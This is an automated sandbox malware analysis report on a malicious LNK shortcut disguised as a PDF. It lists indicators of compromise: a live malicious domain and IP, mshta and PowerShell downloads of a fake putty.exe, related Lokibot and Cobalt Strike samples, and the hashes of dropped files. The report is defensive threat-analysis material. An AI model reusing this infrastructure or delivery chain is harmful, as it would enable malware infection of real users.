http://ukr-netdigitalhub.pro/putty	powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ukr-netdigitalhub.pro/x64dbg2...	mshta.exe, 00000007.00000003.1413222166.0000022686E0A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ukr-netdigitalhub.pro/putty.exe	powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/	powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, putty.exe, putty.exe, 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmp, putty.exe, 00000015.00000000.1600625150.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmp, putty.exe.13.dr	false		high
https://contoso.com/	powershell.exe, 0000000D.00000002.1683139322.000001B4E1001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000A.00000002.1889681010.00000194EC814000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1889681010.00000194EC957000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1782431399.00000194DE1E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1683139322.000001B4E1001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ukr-netdigitalhub.pro/x64dbg2ent	mshta.exe, 00000007.00000002.1432845185.0000022686D76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1429679889.0000022686D76000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ukr-netdigitalhub.pro/x64dbg2...&	mshta.exe, 00000007.00000003.1377641844.0000022686E0A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://oneget.orgX	powershell.exe, 0000000A.00000002.1782431399.00000194DE035000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ukr-netdigitalhub.pro/x64dbg2DataFPS_BROW	mshta.exe, 00000007.00000002.1443996228.0000022687110000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000A.00000002.1782431399.00000194DC7A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1604581139.000001B4D0F71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ukr-netdigitalhub.pro/put	powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ukr-netdigitalhub.pro/p	powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000000A.00000002.1889681010.00000194EC814000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1889681010.00000194EC957000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1782431399.00000194DE1E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1683139322.000001B4E1001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 0000000A.00000002.1782431399.00000194DE035000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/	2D85F72862B55C4EADD9E66E06947F3D0.16.dr	false		high
https://sectigo.com/CPS0	powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000D.00000002.1604581139.000001B4D122E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000D.00000002.1604581139.000001B4D149D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ukr-netdigitalhub.pro/	powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000D.00000002.1604581139.000001B4D122E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 0000000A.00000002.1782431399.00000194DD3D5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ukr-netdigitalhub.pro/pu	powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000D.00000002.1683139322.000001B4E1001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	false		high
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 00000009.00000003.1380274984.000001E7B9A10000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr	false		high
http://crl.ver)	svchost.exe, 00000009.00000002.2577782786.000001E7B9C00000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ukr-netdigitalhub.pro/x64dbg2:asLMEMP	mshta.exe, 00000007.00000002.1448567133.0000022E8F120000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1604581139.000001B4D257B000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	false		high
http://ukr-netdigitalhub.pro/x64dbg2i	mshta.exe, 00000007.00000003.1429253455.0000022686D91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1377641844.0000022686D8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1433029163.0000022686D94000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000D.00000002.1604581139.000001B4D122E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ukr-netdigitalhub.pro/x64dbg2l	mshta.exe, 00000007.00000003.1429253455.0000022686DC5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1377641844.0000022686DC5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1433029163.0000022686DC5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1604581139.000001B4D257B000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	false		high
https://www.adobe.co	ReaderMessages.15.dr	false		high
https://g.live.com/odclientsettings/Prod1C:	qmgr.db.9.dr	false		high
http://ukr-netdigitalhub.pro	powershell.exe, 0000000D.00000002.1604581139.000001B4D122E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1604581139.000001B4D2559000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	false		high
http://ukr-netdigitalhub.pro/putt	powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ukr-netdigitalhub.pro/x64dbg2W	mshta.exe, 00000007.00000003.1429253455.0000022686D91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1377641844.0000022686D8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1433029163.0000022686D94000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	powershell.exe, 0000000D.00000002.1683139322.000001B4E1F90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1604581139.000001B4D257B000.00000004.00000800.00020000.00000000.sdmp, putty.exe.13.dr	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000D.00000002.1604581139.000001B4D149D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ukr-netdigitalhub.pro/x64dbg2C:	mshta.exe, 00000007.00000003.1377641844.0000022686E0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1436832702.0000022686E0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1419941933.0000022686E0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1413222166.0000022686E0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1432548176.0000022686D50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ukr-netdigitalhub.pro/putty.	powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 0000000A.00000002.1782431399.00000194DC7A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1604581139.000001B4D0F71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ukr-netdigitalhub.pro/x64dbg2http://ukr-netdigitalhub.pro/x64dbg2	mshta.exe, 00000007.00000003.1422277497.0000022E89AD3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ukr-netdigitalhub.pro/x64dbg2H	mshta.exe, 00000007.00000002.1443883497.0000022687100000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://oneget.org	powershell.exe, 0000000A.00000002.1782431399.00000194DE035000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ukr-netdigitalhub.p	powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://ukr-netdigitalhub.pro/putty.ex	powershell.exe, 0000000D.00000002.1604581139.000001B4D2504000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.177.166	ukr-netdigitalhub.pro	Bulgaria		43561	NET1-ASBG	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1560897
Start date and time:	2024-11-22 14:16:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	filepdf.pdf.lnk.download.lnk
Detection:	MAL
Classification:	mal100.evad.winLNK@28/71@3/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 80% Number of executed functions: 59 Number of non-executed functions: 187
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.18.84.141, 199.232.214.172, 2.18.84.145, 172.64.41.3, 162.159.61.3, 52.5.13.197, 23.22.254.206, 54.227.187.23, 52.202.204.11, 23.195.39.65, 88.221.134.74, 88.221.135.203, 88.221.135.90, 88.221.135.89, 88.221.135.202, 88.221.134.75, 88.221.134.64, 88.221.135.72, 88.221.135.81, 2.20.60.204, 23.193.114.8, 23.193.114.34, 88.221.134.66, 88.221.134.59, 88.221.135.74, 88.221.135.209, 88.221.134.57, 88.221.135.73, 88.221.135.201, 88.221.134.17, 88.221.135.216, 88.221.135.210, 88.221.134.10, 88.221.135.211, 88.221.134.24
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, time.windows.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
Execution Graph export aborted for target mshta.exe, PID 7812 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 8120 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: filepdf.pdf.lnk.download.lnk

Simulations

Behavior and APIs

Time	Type	Description
08:17:21	API Interceptor	114x Sleep call for process: powershell.exe modified
08:17:24	API Interceptor	2x Sleep call for process: svchost.exe modified
08:17:27	API Interceptor	1x Sleep call for process: mshta.exe modified
09:50:35	API Interceptor	2x Sleep call for process: AcroCEF.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94.156.177.166	SecuriteInfo.com.Trojan.PackedNET.1454.25156.3444.exe	Get hash	malicious	DarkTortilla, SmokeLoader	Browse	unicalads.ru/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ukr-netdigitalhub.pro	2.ps1	Get hash	malicious	Unknown	Browse	94.156.177.166
bg.microsoft.map.fastly.net	VKXD1NsFdC.exe	Get hash	malicious	ScreenConnect Tool	Browse	199.232.210.172
	hx0XzDVE1J.exe	Get hash	malicious	ScreenConnect Tool	Browse	199.232.214.172
	PZI8hMQHWg.exe	Get hash	malicious	ScreenConnect Tool	Browse	199.232.210.172
	lIUubnREXh.exe	Get hash	malicious	ScreenConnect Tool	Browse	199.232.214.172
	cFIg55rrfH.exe	Get hash	malicious	ScreenConnect Tool	Browse	199.232.210.172
	VKXD1NsFdC.exe	Get hash	malicious	ScreenConnect Tool	Browse	199.232.214.172
	jsYhI4KOpg.exe	Get hash	malicious	ScreenConnect Tool	Browse	199.232.210.172
	phish_alert_sp2_2.0.0.0 (6).eml	Get hash	malicious	Unknown	Browse	199.232.214.172
	file.exe	Get hash	malicious	Credential Flusher	Browse	199.232.214.172
	Sat.bat	Get hash	malicious	AsyncRAT	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NET1-ASBG	2.ps1	Get hash	malicious	Unknown	Browse	94.156.177.166
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41
	stthigns.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41
	goodtoseeuthatgreatthingswithentirethingsgreatfor.hta	Get hash	malicious	Cobalt Strike, Lokibot	Browse	94.156.177.41
	PO-000041492.docx.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41
	ECxDwGGFH3.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41
	greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	94.156.177.41
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41
	WjcXwIcclB.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41
	0aA7F59xDl.exe	Get hash	malicious	Lokibot	Browse	94.156.177.95

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\putty.exe	Invoice-UPS-218931.pdf.lnk.mal.lnk	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7067202371746778
Encrypted:	false
SSDEEP:	1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqn:2JIB/wUKUKQncEmYRTwh0j
MD5:	33C04371433F3DDDAB1C6A087A9D35ED
SHA1:	44AB2B26784A1066B345AEC0CCB73D38495357F8
SHA-256:	EC515F135402911BF063BC73F1D1C4827A4BE71C004971BF4BD945E56EBF115B
SHA-512:	72B15C090DBF701D6C1FB061B09B4E0FC84C2FB0E28184BD94EE40670A06DE10F4EDEA447E4BF278CFCAA60544029558D3347A21960C3F5620E534A5B83D8DF7
Malicious:	false
Preview:	...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x63a94221, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7900147853698984
Encrypted:	false
SSDEEP:	1536:TSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:TazaPvgurTd42UgSii
MD5:	68EB032CE7877A7525AFD7574F78DB96
SHA1:	B8F92EBB9FBEE70196EE93EAD77A3A57571FBA61
SHA-256:	BBB90B1E51267A97C04BEF47B1F13BE6F795B61EE466B750708FF50ED715FA22
SHA-512:	BA2EB9BADF962711FC54230001B04B5683E195CB2C8C5EA3F62B4A08D1246824815135891A800DFA2BA02B748BF4BB317EDFFC8B840EF61E39810DAA79A76A2F
Malicious:	false
Preview:	c.B!... ...............X\...;...{......................0.`.....42...{5......\|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{...................................b:?.....\|...................2.......\|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08223874078245741
Encrypted:	false
SSDEEP:	3:ctKYeKRCZcjNt/57Dek3JyHi90PcZollEqW3l/TjzzQ/t:0KzwTPR3ty+Imd8/
MD5:	077494EB1EC6ACDFA48CBA85371ACD61
SHA1:	B1F089C53C00EE7524AD0218436E287F598147AC
SHA-256:	28E2DBBBDE9101C430867466C200AB4DB557B53AD29A94E8D247C8A57F1E7E91
SHA-512:	2FAAF10D6EF0AA7495DAB9B00527B842F3C4FA010E2B24ECC27AEA5A93F34D17ACB85D7C1D96F69C2F295442A4988B030B665E1CEA8B91EA91443BBDCB0E1A99
Malicious:	false
Preview:	...\|.....................................;...{.......\|..42...{5.........42...{5.42...{5...Y.42...{59.................2.......\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	300
Entropy (8bit):	5.273005109839387
Encrypted:	false
SSDEEP:	6:HJN+q2PcNwi2nKuAl9OmbnIFUt8YRbZmw+YRrVkwOcNwi2nKuAl9OmbjLJ:6vLZHAahFUt8sb/+sx54ZHAaSJ
MD5:	95CFB17F61843500F7E72AB802AC3CC8
SHA1:	B25F1A50F994BC1C3D0245012E79FDD618050761
SHA-256:	2A29455F7416957D469135B82EE5F18A912E91200D64F04F4289951468092FB5
SHA-512:	98014AEC3D0914B6E0A3D425AAC3BFD65718B3BEB4A89A4BFE5907C8E9717F9B9147DE505CF8866E87C31C7CEAA93C4AC1E668DA9DD0F37C2D53A3D4EE10221A
Malicious:	false
Preview:	2024/11/22-09:50:24.846 1778 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/22-09:50:24.848 1778 Recovering log #3.2024/11/22-09:50:24.848 1778 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	300
Entropy (8bit):	5.273005109839387
Encrypted:	false
SSDEEP:	6:HJN+q2PcNwi2nKuAl9OmbnIFUt8YRbZmw+YRrVkwOcNwi2nKuAl9OmbjLJ:6vLZHAahFUt8sb/+sx54ZHAaSJ
MD5:	95CFB17F61843500F7E72AB802AC3CC8
SHA1:	B25F1A50F994BC1C3D0245012E79FDD618050761
SHA-256:	2A29455F7416957D469135B82EE5F18A912E91200D64F04F4289951468092FB5
SHA-512:	98014AEC3D0914B6E0A3D425AAC3BFD65718B3BEB4A89A4BFE5907C8E9717F9B9147DE505CF8866E87C31C7CEAA93C4AC1E668DA9DD0F37C2D53A3D4EE10221A
Malicious:	false
Preview:	2024/11/22-09:50:24.846 1778 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/22-09:50:24.848 1778 Recovering log #3.2024/11/22-09:50:24.848 1778 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	341
Entropy (8bit):	5.252991224120339
Encrypted:	false
SSDEEP:	6:H1jk+q2PcNwi2nKuAl9Ombzo2jMGIFUt8Y1tZmw+Y1tkVkwOcNwi2nKuAl9Ombzz:Vj5vLZHAa8uFUt8It/+IG54ZHAa8RJ
MD5:	153ECC85CA43F785A8C9F5D8B16FA5DE
SHA1:	0F15B78EF349AF69EF3FE53592DE2CDBCC5E5ED0
SHA-256:	A1C158900B1BCA0173B3A54A81A67313DBEC13E3A68A7576E38FCEA67E9AAEC5
SHA-512:	48783F54B2DFA00F735532FE2D30F6239D1C4CD35C0ACD497C282C3E06E61AA0106C141D121C012CDB950897A05579986F234E888DE502D158A9AA3DAD04186B
Malicious:	false
Preview:	2024/11/22-09:50:24.986 7f8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/22-09:50:24.987 7f8 Recovering log #3.2024/11/22-09:50:24.988 7f8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	341
Entropy (8bit):	5.252991224120339
Encrypted:	false
SSDEEP:	6:H1jk+q2PcNwi2nKuAl9Ombzo2jMGIFUt8Y1tZmw+Y1tkVkwOcNwi2nKuAl9Ombzz:Vj5vLZHAa8uFUt8It/+IG54ZHAa8RJ
MD5:	153ECC85CA43F785A8C9F5D8B16FA5DE
SHA1:	0F15B78EF349AF69EF3FE53592DE2CDBCC5E5ED0
SHA-256:	A1C158900B1BCA0173B3A54A81A67313DBEC13E3A68A7576E38FCEA67E9AAEC5
SHA-512:	48783F54B2DFA00F735532FE2D30F6239D1C4CD35C0ACD497C282C3E06E61AA0106C141D121C012CDB950897A05579986F234E888DE502D158A9AA3DAD04186B
Malicious:	false
Preview:	2024/11/22-09:50:24.986 7f8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/22-09:50:24.987 7f8 Recovering log #3.2024/11/22-09:50:24.988 7f8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.96775079901533
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqhhsBdOg2Hucaq3QYiubSpDyP7E4TX:Y2sRdsZdMHR3QYhbSpDa7n7
MD5:	755AED3180E5D6EF66E124D9B6CECF17
SHA1:	3E1D90FD781C235FE7CB2C20C17D7BF5FAAB5979
SHA-256:	2103477503E02740581EBA8437521BC6810123CE195096F91AF28A7884AC656E
SHA-512:	9F225A496838B9DC70C777BB5A16EFC6CEB80A6EC0C9B397D8FEFC7DE4CC1E94B7E190AF8CEDB55BAD23E2A0E472F2D63EADE0DAAB0F6F85A34782A215826235
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13376847033280804","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":661063},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\d4d62ef1-6e46-4246-9139-8bce1639112f.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	475
Entropy (8bit):	4.96775079901533
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqhhsBdOg2Hucaq3QYiubSpDyP7E4TX:Y2sRdsZdMHR3QYhbSpDa7n7
MD5:	755AED3180E5D6EF66E124D9B6CECF17
SHA1:	3E1D90FD781C235FE7CB2C20C17D7BF5FAAB5979
SHA-256:	2103477503E02740581EBA8437521BC6810123CE195096F91AF28A7884AC656E
SHA-512:	9F225A496838B9DC70C777BB5A16EFC6CEB80A6EC0C9B397D8FEFC7DE4CC1E94B7E190AF8CEDB55BAD23E2A0E472F2D63EADE0DAAB0F6F85A34782A215826235
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13376847033280804","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":661063},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	4099
Entropy (8bit):	5.23288387009086
Encrypted:	false
SSDEEP:	96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPZSlv5:CwNw1GHqPySfkcigoO3h28ytPZSlR
MD5:	79BE63402B21E011AB41C126A656C7C0
SHA1:	CAD06B147B85E91F7EACC22D6D98BA6E585FE583
SHA-256:	C238CEDDB54E161782DE77CCEBAB80E6120D3593483519136FA96583AF399B04
